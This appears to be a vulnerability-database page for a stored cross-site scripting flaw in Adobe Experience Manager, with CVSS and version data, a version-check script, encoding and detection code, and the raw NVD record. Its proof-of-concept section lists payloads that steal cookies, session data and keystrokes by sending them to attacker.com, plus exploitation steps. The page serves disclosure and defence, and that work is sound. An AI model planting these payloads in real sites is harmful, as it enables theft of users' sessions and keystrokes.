Security Vulnerability Report
CVE-2025-64582 CVSS 5.4 MEDIUM

CVE-2025-64582

Published: 2025-12-10 19:16:22
Last Modified: 2025-12-12 18:17:25

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Reading the vector: reachable over the network with low attack complexity, but the attacker needs a low-privileged account (PR:L) and a victim has to view the page holding the stored field (UI:R). Scope is Changed because the injected script runs in the victim's browser rather than in the vulnerable AEM component; confidentiality and integrity impact are Low and availability is unaffected. Weakness: CWE-79 (improper neutralization of input during web page generation).

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE (NVD bound: versions before 6.5.24.0)
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE (NVD bound: releases before 2025.12.0)
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE (6.5 LTS, no version bound given)
Adobe Experience Manager 6.5.23 and all earlier releases
AEM as a Cloud Service (the page marks the exact affected versions as still to be confirmed; the NVD match data in the Raw JSON section bounds them at releases before 2025.12.0)
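The three CPE entries above carry different range semantics (an open-ended range with versionEndExcluding for the classic 6.5 line, another for Cloud Service, and an exact-version entry for 6.5 LTS), so reading them by eye is error-prone. The following is an added example, not part of this page or of any Adobe tooling: it loads the configuration block from this page's Raw JSON section and evaluates whether an installed AEM edition and version fall inside it. The `sw_edition` argument is the CPE sw_edition field exactly as NVD wrote it (`-`, `aem_cloud_service`, `lts`); how a given instance reports its version string is an assumption the caller must supply.

```python
import json

# The configuration block from this page's Raw JSON section (NVD record for
# CVE-2025-64582), trimmed to the fields the check needs.
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*",
   "versionEndExcluding": "6.5.24.0"},
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*",
   "versionEndExcluding": "2025.12.0"},
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*"}
]}]}]
""")

# CPE 2.3 formatted-string field positions (0 = "cpe", 1 = "2.3", 2 = part, ...).
CPE_PRODUCT, CPE_VERSION, CPE_SW_EDITION = 4, 5, 9


def version_tuple(version):
    """'6.5.23' -> (6, 5, 23). Non-numeric components (e.g. 'SP1') compare as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def cmp_versions(a, b):
    """Three-way compare of dotted versions; the shorter one is right-padded
    with zeros so that 6.5.24 == 6.5.24.0. Returns -1, 0 or 1."""
    ta, tb = version_tuple(a), version_tuple(b)
    width = max(len(ta), len(tb))
    ta += (0,) * (width - len(ta))
    tb += (0,) * (width - len(tb))
    return (ta > tb) - (ta < tb)


# NVD range keys and the comparison result (installed vs. bound) each permits.
RANGE_RULES = {
    "versionStartIncluding": lambda c: c >= 0,
    "versionStartExcluding": lambda c: c > 0,
    "versionEndIncluding": lambda c: c <= 0,
    "versionEndExcluding": lambda c: c < 0,
}


def cpe_match_applies(match, sw_edition, installed):
    """True if one NVD cpeMatch entry covers the installed AEM edition/version.
    sw_edition is the CPE sw_edition field: "-" for the classic 6.5 line,
    "aem_cloud_service" for AEM as a Cloud Service, "lts" for 6.5 LTS."""
    fields = match["criteria"].split(":")
    if fields[CPE_PRODUCT] != "experience_manager" or fields[CPE_SW_EDITION] != sw_edition:
        return False
    # An explicit version in the criteria (the 6.5 LTS entry) is an exact match.
    if fields[CPE_VERSION] != "*" and cmp_versions(fields[CPE_VERSION], installed) != 0:
        return False
    for key, allowed in RANGE_RULES.items():
        if key in match and not allowed(cmp_versions(installed, match[key])):
            return False
    return bool(match.get("vulnerable"))


def is_affected(sw_edition, installed, configurations=NVD_CONFIGURATIONS):
    """Evaluate the NVD configuration tree: each node combines its cpeMatch
    entries per its operator, and a configuration combines its nodes per its
    own operator (AND when absent, the NVD default)."""
    for config in configurations:
        node_results = []
        for node in config["nodes"]:
            hits = [cpe_match_applies(m, sw_edition, installed) for m in node["cpeMatch"]]
            result = any(hits) if node.get("operator", "OR") == "OR" else all(hits)
            node_results.append(not result if node.get("negate") else result)
        combine = all if config.get("operator", "AND") == "AND" else any
        if node_results and combine(node_results):
            return True
    return False


if __name__ == "__main__":
    for edition, version in [("-", "6.5.23.0"), ("-", "6.5.24.0"),
                             ("aem_cloud_service", "2025.11.0"), ("lts", "6.5")]:
        state = "AFFECTED" if is_affected(edition, version) else "not affected"
        print(f"AEM sw_edition={edition!r} version {version}: {state}")
```

Note that the LTS entry is evaluated exactly as NVD wrote it (version `6.5`, no range), so an LTS build reporting a longer version string will not match it; treat that as a prompt to check the vendor bulletin rather than as a clean bill of health.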

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64582 Stored XSS PoC for Adobe Experience Manager -->
<!-- Inject this payload into a form field that is later displayed to users -->

<!-- Basic XSS payload -->
<script>console.log('XSS Triggered');alert('CVE-2025-64582')</script>

<!-- Cookie stealing payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session hijacking payload -->
<script>
var img = new Image();
img.src = 'https://attacker.com/log?data=' + encodeURIComponent(document.cookie + '|' + document.location.href);
</script>

<!-- Keylogger payload -->
<script>
document.addEventListener('keypress', function(e) {
  fetch('https://attacker.com/keys?k=' + e.key);
});
</script>

<!-- Steps to exploit:
1. Authenticate as a low-privileged user
2. Navigate to a form page in AEM
3. Fill in a text field with one of the payloads above
4. Submit the form
5. Wait for an admin or other user to view the page containing the malicious content
6. The JavaScript will execute in the victim's browser -->

These payloads are generic stored-XSS probes rather than an AEM-specific exploit: neither the advisory text nor the NVD record names the vulnerable form field or component, so the "form page" in the steps is whichever field a low-privileged account can write to and other users later view. attacker.com is a placeholder for a collector under the tester's control. The cookie-stealing variants only return cookies that are readable from script; anything set with the HttpOnly flag is not exposed through document.cookie, so a successful injection does not automatically mean session theft.
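The payloads above only work because the stored field value reaches the page without output encoding for its HTML context. The following is an added example, not code from this page or from Adobe: it takes the page's four payloads (reflowed onto single lines) as stored field values, renders them through the vulnerable pattern and through the encoded one, and runs a small parser-based check that flags script-bearing constructs in rendered markup. The same checker can be run over exported form submissions during cleanup to find injected records. The template, the field name and the triage helper are illustrative; in AEM the encoding step corresponds to HTL's default context-aware output escaping (which a template gives up with context='unsafe') or XSSAPI.encodeForHTML in Java code.

```python
import html
from html.parser import HTMLParser

# The four payloads from the PoC section of this page, stored as a form field
# value would be. "attacker.com" is the page's placeholder collector host.
STORED_PAYLOADS = [
    "<script>console.log('XSS Triggered');alert('CVE-2025-64582')</script>",
    "<img src=x onerror=\"fetch('https://attacker.com/steal?cookie='+document.cookie)\">",
    "<script>var img = new Image(); img.src = 'https://attacker.com/log?data=' "
    "+ encodeURIComponent(document.cookie + '|' + document.location.href);</script>",
    "<script>document.addEventListener('keypress', function(e) { "
    "fetch('https://attacker.com/keys?k=' + e.key); });</script>",
]

# Illustrative markup for displaying a submitted field (not an AEM component).
FIELD_TEMPLATE = '<div class="form-field"><span class="label">Comment</span><p>{value}</p></div>'


def render_unsafe(value):
    """The vulnerable pattern: the stored value is interpolated as-is, so any
    markup inside it becomes part of the DOM of every viewer's page."""
    return FIELD_TEMPLATE.format(value=value)


def render_safe(value):
    """The fix for element content: HTML-entity-encode before interpolating.
    quote=True also encodes ' and " so the same helper is safe inside a
    quoted attribute value; URL and JavaScript contexts need their own encoders."""
    return FIELD_TEMPLATE.format(value=html.escape(value, quote=True))


class ActiveContentFinder(HTMLParser):
    """Walks rendered markup and records constructs that execute script:
    <script> elements, on* event-handler attributes and javascript: URLs."""
    URL_ATTRS = {"href", "src", "action", "formaction", "data"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in self.URL_ATTRS and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")


def find_active_content(markup):
    """Return the script-bearing constructs found in markup (empty list if none).
    Encoded payloads show up only as text data, so they produce no findings."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def triage_stored_values(values):
    """Map each stored value that would carry active content when rendered raw
    to its findings; the values that are absent from the result are inert."""
    flagged = {}
    for value in values:
        findings = find_active_content(render_unsafe(value))
        if findings:
            flagged[value] = findings
    return flagged


if __name__ == "__main__":
    for payload in STORED_PAYLOADS:
        print("raw render:    ", find_active_content(render_unsafe(payload)))
        print("encoded render:", find_active_content(render_safe(payload)))
```

The checker is deliberately a parser, not a regex: it sees attributes the way the browser's tokenizer does, so unquoted values such as `onerror=...` and case variations like `JavaScript:` are caught without maintaining a pattern list.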

References

https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html - Vendor Advisory (Adobe security bulletin APSB25-115)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64582", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:21.610", "lastModified": "2025-12-12T18:17:24.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}